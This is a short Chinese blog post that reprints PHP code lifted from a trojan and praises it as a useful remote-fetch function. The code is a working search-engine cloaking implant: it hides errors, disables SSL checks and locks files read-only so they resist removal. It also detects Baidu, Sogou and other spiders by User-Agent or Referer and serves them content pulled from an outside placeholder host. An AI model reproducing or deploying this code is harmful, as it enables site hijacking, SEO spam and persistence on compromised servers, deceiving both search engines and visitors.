一个远程调用另外站点数据函数

 今天查看木马中发现一个黑客的远程调用数据函数蛮有用的，今天记录下：

?

1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48

set_time_limit(0); error_reporting(0); $tr = "stristr"; $er = $_SERVER; function httpGet($url) {   $ch = curl_init();   //设置选项，包括URL   curl_setopt($ch, CURLOPT_URL, $url);   curl_setopt($ch, CURLOPT_USERAGENT, 'Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)');   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, FALSE);   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, FALSE);   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);   curl_setopt($ch, CURLOPT_HEADER, 0);   //执行并获取HTML文档内容   $output = curl_exec($ch);   //释放curl句柄   curl_close($ch);   //打印获得的数据   return $output; } $filename1 = @end(explode('/', $url1)); function set_writeable($file_name) {    @chmod($file_name, 0444); } @chmod(__FILE__, 0444); set_writeable($filename1); define('url',$er['REQUEST_URI']); define('ref',$er['HTTP_REFERER']); define('ent',$er['HTTP_USER_AGENT']); define('site',"http://www.domain.com/"); define('road',"/?" .$er['HTTP_HOST'] . url); define('regs','@Baidu|Sogou|Yisou|Soso|Haosou|Spider|So.com|Sm.cn@i'); define('area',$tr(url,".xml") or $tr(url,".doc") or $tr(url,".pdf") or $tr(url,".txt") or $tr(url,".ppt") or $tr(url,".pptx") or $tr(url,".xls") or $tr(url,".csv") or $tr(url,".shtml") or $tr(url,".tacc")or $tr(url,".ga")or $tr(url,".asp")or $tr(url,".aspx")or $tr(url,".gq")or $tr(url,".html") or $tr(url,".xlsx")or $tr(url,".znb")or $tr(url,".rar") or $tr(url,".zip")or $tr(url,".cnm")or $tr(url,".bak") or $tr(url,".jsp")or $tr(url,".jspx")and $tr(url,"?")); if (area && preg_match(regs, ref)) {     echo file_get_contents("http://www.domain.com/");     exit; } if (preg_match(regs, ent)) {     if (area) {         echo httpGet(site.road);         exit;     } else {         echo httpGet("http://www.domain.com/xxx.php");         ob_flush();         flush();     } }